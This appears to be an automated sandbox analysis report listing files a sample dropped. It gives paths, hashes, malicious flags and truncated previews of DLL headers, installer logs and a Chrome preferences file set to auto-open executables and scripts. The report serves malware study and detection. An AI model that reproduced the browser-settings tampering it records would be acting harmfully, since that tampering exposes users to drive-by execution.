                                                                                                                                                                                                                                            Preview:UNKRLCVOHVAXPHOHAZYDIMBTYYPLYBYVUEQLGGJJCFCITCEMGOMMPTCXLGLYUZHZWMTUNUOFUUYAUDMSGBWJKAMIFUAYTDIKVYQPGYQSIZTANWSUNZDHBRNONSOUWVUJZFBPOZIMZOUPVAYJKSJULUHYRYUUOLYWEWFCYAZHMJKHXUZLTHEXFDNRXIUQOZHGGMDFHSXAJKHPBRPJJKVVXGMDIMEMMFXEOBQJSMYSSMPVSVUNJLJSSMEFHHLFEVPWZDDEIKQGOJPOJWTWMNPIEQXWXOBLNLDRNRUGDUXCMTURFAWMSSYAENGRWRBIJOYJNUMDYXNDETRQMYAMGJYZKZQPFPCONTLPPRLYMQJPIWCAXNOLGZOTNQEWQGBVSNORDVIXIUJAENWBXHSXSDNAMBAXUDBRCRHHYFJQLZEAGFZJUFMBIUBABNXVYITYPKRJUMGDPPABWBKNLHDKPLRUIRQXXKLFZAHHOQZHNTUNORTHIPKRZRDGRVPKIZRHYAGOVNDISDQRFXONCHILLZJTGXRZPEIPHKZXDBODDSUZIKNUVTNMZGVZQILJHRYJYZKDBLCLJFWSXRREYFFMEXBICHNCCTBTTTTZZVMSHPBKJMXPXFJNIDQFSJDMCXXUZPFVBFVKYCVFVQFUVOJWWIUNBICQVZGOZZVDJKKZTGDLWXADCBHYGUDWYWTYVYOOICLDGZXJHSTPFGQBMRCCCBJSXCPVVBKRNYTLTAOWPNJFKXUXQORRVHCHMSRAHQHFDEMZUFOFJOQFXHQBLWKNHXKEBLUJMQCFCSTBVXKUUPPXZNEWBUZPPVJFCDLXJEGEZSQSHHBNUCTRMEDMGPNZBHGEXVTWWZFELEFQQWXGHSVDMBAGZANSOHWAGHWRFCVNRSBOOZFJQONOYPNXBMHJINMGSGLMUSTAOMZXKOIHFYYSJWELBRBKMJUVQKVVFUFLDZKJVPCATVIHCISAYNPTMBEUQYJRYFUSBKOSITLVDUTJ
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u48o.0.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.696835919052288
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:Fn9jgzow1W6XZpt5tv2wi/9nymo1rcjQV26NyDmb5HPZ:zjgEw1bpfTi1yfhcUV2by5HPZ
                                                                                                                                                                                                                                            MD5:197C0DB71198B230CF6568A2AA40C23B
                                                                                                                                                                                                                                            SHA1:BAE63DD78D567ED9183C0F8D72A191191745C4E5
                                                                                                                                                                                                                                            SHA-256:6935BFDC854F927C6F05F97AE4865ECAA22F7D10D909725B7D67D87F17FF0F41
                                                                                                                                                                                                                                            SHA-512:972C7D9B89EBADA01E3C2D21B391AFA317A8B587DE768875B3B7082761E17AF795BF72B49DEE71DC1F5363863EEF3C7E2966E6AE3D2E6F481E373A77163316C7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:VWDFPKGDUFQFRUPAPPQGIIRLBMRJVLIMQXSWPKBCUGCSOYPXVZRYABCFRPGQFBKSRNNBPWCDTZQKOZTHEOXCUIMHAWUSAMNXIIEPWHBTSEWOJOEJUQZAZDGIRHLRLOCXDMGTXDXEJOWMXIFWDAGYCVGTBKYMXDYOTCGCARASSUUCMCNKFTCZOAQXBNILJTUOLCZYYUZFHGWFTCHDXYTZOEGFUAJLGZANLVNEVWHIIIRSURMEOTZWVHRLOGMTVRWICZIENOPRWLNSVHXQMULNZLBRICRJVVBJMJGVHJSCKBXVMICMFJQQTCIUSXRLUSMTSWGCQDGVFRQVIURPCVBLZIFEZKBUZGKUJIZAWRLYVVXWFGKCMRQFIVHFVXBDHBEKOJAILQRRTZPUTWBVRNRLZEMFWWBQUGOQWYUEGPKIVHQJHQHSJWVVENNMOAHFXILPEJPHZOQMAVSUXBQQEJFNFIKFQWEWEPKTIQQETBFSABZAOBVXEBARHKLVLMCAFGXXBLNGBZRJQOGMNGDAODYAVKYTFOYJRZDLZIYWZNRPPVZNHCTKOIHMETIQDHDGBHUSSZDLEXZSKRZLTIUMEADMONDOIPXWOAELAEUEJDZBECSINHBJNAYCCYTMEJUWYDNJDACYHUQIQZZBMKKRCJDQSGEHBSIIWWFOPRPYXHWNRLQFZPXUQSZHWHJGRVRNYZBBQUFKAWZTIDUQSFTJJPUAKBRGABJCNWDXOUPLCRZTCKKHIKTYZOGNWDCTUTSDFJLIDJMCLEXGJRUQRWREGZISCYJSMOFQXYMCGMMJMSQASADRKRHYGUYLIBJAAJOTHXHEVLCQEGGJBJBKULCPBXSIOOIEJPQIXDQHKAQSQMLWOISQZQTMTCLGTEHDXRHOIVIVQGKJJACQWPPTBGGHHKJRRPRENADLUPCMGIERRBDQYQJFUSIHVYGVGSIQZZWUZLCSUBMKCQYKCYTJRNNKEZZWFQMXWYFKKWAXFIFRJZTE
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u48o.0.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):685392
                                                                                                                                                                                                                                            Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                            MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                            SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                            SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                            SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):331
                                                                                                                                                                                                                                            Entropy (8bit):5.222726968982172
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:BMKLFyzT1XataAgrCYqyzTxNFmLIYvgBtXWOyzTr+HB1JCHyzfI0XY4eA:foFAaXCYzpmkYvgLXWXTM/B773
                                                                                                                                                                                                                                            MD5:3347FE2DDE7DC6A2F720FF914861DF05
                                                                                                                                                                                                                                            SHA1:8CF3AE047CC020D42D5D7A79560CB63412A51641
                                                                                                                                                                                                                                            SHA-256:A84DAB2F87FFD2BFFEFA267EC213EFFBEBB2830235504A0A12A7E6AB6AABEA12
                                                                                                                                                                                                                                            SHA-512:7CC2034BD187E9018F316AA051CA8DC305924BDE418A383350DC33062D4FD646FF36741A20BD98B80B0F2CFD0E7A332BFC09622E680E0FE297E8989FE8412B5D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:Bootstrap LogFile..-----------------..[23/04/2024 11:35:05]: Product System Mechanic Determined From 5488CB36-BE62-4606-B07B-2EE938868BD1..[23/04/2024 11:35:05]: This Brand IOLODEFAULT Not Detected As Installed..[23/04/2024 11:35:05]: No Supported Products Were Detected On This System..[23/04/2024 11:36:17]: Telemetry Data Sent..
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u48o.1.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):346
                                                                                                                                                                                                                                            Entropy (8bit):5.177469714361768
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:qt0TCfk3VotGjZb34L0W2QiloUCs0TCfk3VotGjZb34LOLQiloe:7TXVotgOL0yiv6TXVotgOLJit
                                                                                                                                                                                                                                            MD5:2679B22403DA71C92A007AA260B3B048
                                                                                                                                                                                                                                            SHA1:473352929842873A26813761F8CA8F865DB0471F
                                                                                                                                                                                                                                            SHA-256:0241971A8D817B3CFBC585D90E509D1C4CF8339F05914B28ED63C4CD78960A92
                                                                                                                                                                                                                                            SHA-512:34AB9AD98B493FC7F32BB86E95CF01AE6DBC76D276274046B5D4502B1AC7936AD5DB48702FCE5D644FC95EBD23ECC0CC7D17E525E6F8B99AD8997771F5D8D469
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:[04/23/24 09:43:20] PerformGetOrPost : Attempting a POST on http://svc.iolo.com/__svc/sbv/DownloadManager.ashx...[04/23/24 09:43:20] IsValidCommunication : Result := True...[04/23/24 09:43:34] PerformGetOrPost : Attempting a POST on http://svc.iolo.com/__svc/sbv/DownloadManager.ashx...[04/23/24 09:43:35] IsValidCommunication : Result := True...
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u48o.0.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):608080
                                                                                                                                                                                                                                            Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                            MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                            SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                            SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                            SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u48o.0.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):450024
                                                                                                                                                                                                                                            Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                            MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                            SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                            SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                            SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u48o.0.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2046288
                                                                                                                                                                                                                                            Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                            MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                            SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                            SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                            SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u48o.0.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257872
                                                                                                                                                                                                                                            Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                            MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                            SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                            SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                            SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u48o.0.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):80880
                                                                                                                                                                                                                                            Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                            MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                            SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                            SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                            SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):15130
                                                                                                                                                                                                                                            Entropy (8bit):5.544742646813256
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:xVknXBx1kXqKf/pUZNCgVLH2HfCdIrUobHGkkn/9r3J:xmXBx1kXqKf/pUZNCgVLH2Hf+IrUorGX
                                                                                                                                                                                                                                            MD5:C0759C17471FB74ADB6FB4C4997D5AB5
                                                                                                                                                                                                                                            SHA1:96234048EA455CEB6C017C469095D466F32A838B
                                                                                                                                                                                                                                            SHA-256:BA8599CA3F7BD51FA818877BFBD703C91FCF1868C1AA64628A2514A65DC5EC02
                                                                                                                                                                                                                                            SHA-512:EB4A9E7C76C751FAAEEE5364CF83CA97D8B2572AD0F424403298E64AD99395555ECF565495214137505578CD3CC7F82969E3600EC338F80DD5200372A6CA6A5D
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:{"download":{"directory_upgrade":true,"always_open_pdf_externally":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:tbz2:lz:msi"},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13340965310875704","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13340965310875704","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, e
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
                                                                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3::
                                                                                                                                                                                                                                            MD5:93B885ADFE0DA089CDF634904FD59F71
                                                                                                                                                                                                                                            SHA1:5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
                                                                                                                                                                                                                                            SHA-256:6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
                                                                                                                                                                                                                                            SHA-512:B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:.
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u48o.0.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):685392
                                                                                                                                                                                                                                            Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                            MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                            SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                            SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                            SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u48o.0.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):608080
                                                                                                                                                                                                                                            Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                            MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                            SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                            SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                            SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u48o.0.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):450024
                                                                                                                                                                                                                                            Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                            MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                            SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                            SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                            SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u48o.0.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2046288
                                                                                                                                                                                                                                            Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                            MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                            SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                            SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                            SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                            Reputation:unknown
